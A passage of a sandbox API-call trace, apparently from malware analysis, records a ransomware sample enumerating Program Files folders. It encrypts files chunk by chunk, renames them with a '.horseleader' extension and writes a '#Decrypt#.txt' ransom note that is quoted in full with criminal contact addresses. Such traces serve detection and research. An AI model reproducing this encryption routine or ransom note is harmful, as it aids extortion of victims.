pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*") returned 74 [0250.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.789] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.789] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\.") returned 74 [0250.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\..") returned 75 [0250.790] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.790] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.790] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="14", cAlternateFileName="")) returned 1 [0250.790] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0250.790] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14") returned 75 [0250.790] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0250.790] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0250.790] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.790] GetProcessHeap () returned 0x780000 [0250.790] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.790] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*") returned 77 [0250.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.791] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\.") returned 77 [0250.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.791] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.791] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\..") returned 78 [0250.791] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.791] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="BIN", cAlternateFileName="")) returned 1 [0250.791] lstrcmpiW (lpString1="BIN", lpString2="Windows") returned -1 [0250.791] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned 79 [0250.791] lstrcmpW (lpString1="BIN", lpString2=".") returned 1 [0250.791] lstrcmpW (lpString1="BIN", lpString2="..") returned 1 [0250.792] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.792] GetProcessHeap () returned 0x780000 [0250.792] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.792] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*") returned 81 [0250.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.793] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.793] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\.") returned 81 [0250.793] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.793] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="..", cAlternateFileName="")) returned 1 [0250.793] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.793] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\..") returned 82 [0250.793] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.793] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.793] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="1033", cAlternateFileName="")) returned 1 [0250.793] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.794] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033") returned 84 [0250.794] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.794] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.794] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.794] GetProcessHeap () returned 0x780000 [0250.794] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.794] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*") returned 86 [0250.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\*", lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName=".", cAlternateFileName="")) returned 0x7c68e0 [0250.794] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.794] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\.") returned 86 [0250.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.795] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="..", cAlternateFileName="")) returned 1 [0250.795] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.795] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\..") returned 87 [0250.795] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.796] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 1 [0250.796] lstrcmpiW (lpString1="FPEXT.MSG", lpString2="Windows") returned -1 [0250.796] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0250.796] StrStrIW (lpFirst="FPEXT.MSG", lpSrch=".horseleader") returned 0x0 [0250.833] lstrcmpW (lpString1="FPEXT.MSG", lpString2="#Decrypt#.txt") returned 1 [0250.833] lstrcmpW (lpString1="FPEXT.MSG", lpString2="_uninstalling_.png") returned 1 [0250.833] lstrlenW (lpString=".testttjffg") returned 11 [0250.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG", lpSrch=".testttjffg") returned 0x0 [0250.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae5a8 | out: pbBuffer=0x32ae5a8) returned 1 [0250.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae5a8*, pdwDataLen=0x32ae664*=0x24, dwBufLen=0x80 | out: pbData=0x32ae5a8*, pdwDataLen=0x32ae664*=0x80) returned 1 [0250.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0250.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 94 [0250.834] StrStrW (lpFirst="FPEXT.MSG", lpSrch=".txt") returned 0x0 [0250.834] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32ae668 | out: lpFileSize=0x32ae668*=169637) returned 1 [0250.834] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.834] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.837] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.837] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.838] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x12352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.839] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.839] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.839] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.839] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x246a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.839] ReadFile (in: hFile=0x17c, lpBuffer=0x32a95a8, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesRead=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.841] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32a95a8*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32a95a8*, lpNumberOfBytesWritten=0x32ae68c*=0x5000, lpOverlapped=0x0) returned 1 [0250.841] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32ae660*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32ae660*, lpNumberOfBytesWritten=0x32ae68c*=0x4, lpOverlapped=0x0) returned 1 [0250.841] WriteFile (in: hFile=0x17c, lpBuffer=0x32ae5a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae68c, lpOverlapped=0x0 | out: lpBuffer=0x32ae5a8*, lpNumberOfBytesWritten=0x32ae68c*=0x80, lpOverlapped=0x0) returned 1 [0250.842] CloseHandle (hObject=0x17c) returned 1 [0250.842] GetProcessHeap () returned 0x780000 [0250.842] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e61c0 [0250.842] wnsprintfW (in: pszDest=0x7e61c0, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.horseleader") returned 106 [0250.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.horseleader")) returned 1 [0250.843] GetProcessHeap () returned 0x780000 [0250.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e61c0 | out: hHeap=0x780000) returned 1 [0250.843] FindNextFileW (in: hFindFile=0x7c68e0, lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870ca400, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x870ca400, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x296a5, dwReserved0=0xd1bf8a30, dwReserved1=0x338c0a12, cFileName="FPEXT.MSG", cAlternateFileName="")) returned 0 [0250.843] FindClose (in: hFindFile=0x7c68e0 | out: hFindFile=0x7c68e0) returned 1 [0250.843] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\#Decrypt#.txt") returned 98 [0250.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.844] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.844] WriteFile (in: hFile=0x15c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae6a8, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae6a8*=0x5e4, lpOverlapped=0x0) returned 1 [0250.846] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.846] WriteFile (in: hFile=0x15c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae6a8, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae6a8*=0x558, lpOverlapped=0x0) returned 1 [0250.846] CloseHandle (hObject=0x15c) returned 1 [0250.846] GetProcessHeap () returned 0x780000 [0250.846] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.846] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c366f00, ftCreationTime.dwHighDateTime=0x1cac0be, ftLastAccessTime.dwLowDateTime=0x6193ae30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3c366f00, ftLastWriteTime.dwHighDateTime=0x1cac0be, nFileSizeHigh=0x0, nFileSizeLow=0x267d78, dwReserved0=0x63d5bfda, dwReserved1=0x1ff30e1e, cFileName="FPSRVUTL.DLL", cAlternateFileName="")) returned 1 [0250.846] lstrcmpiW (lpString1="FPSRVUTL.DLL", lpString2="Windows") returned -1 [0250.846] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 92 [0250.846] StrStrIW (lpFirst="FPSRVUTL.DLL", lpSrch=".horseleader") returned 0x0 [0250.846] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.847] lstrcmpW (lpString1="FPSRVUTL.DLL", lpString2="_uninstalling_.png") returned 1 [0250.847] lstrlenW (lpString=".testttjffg") returned 11 [0250.847] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL", lpSrch=".testttjffg") returned 0x0 [0250.847] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.847] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft 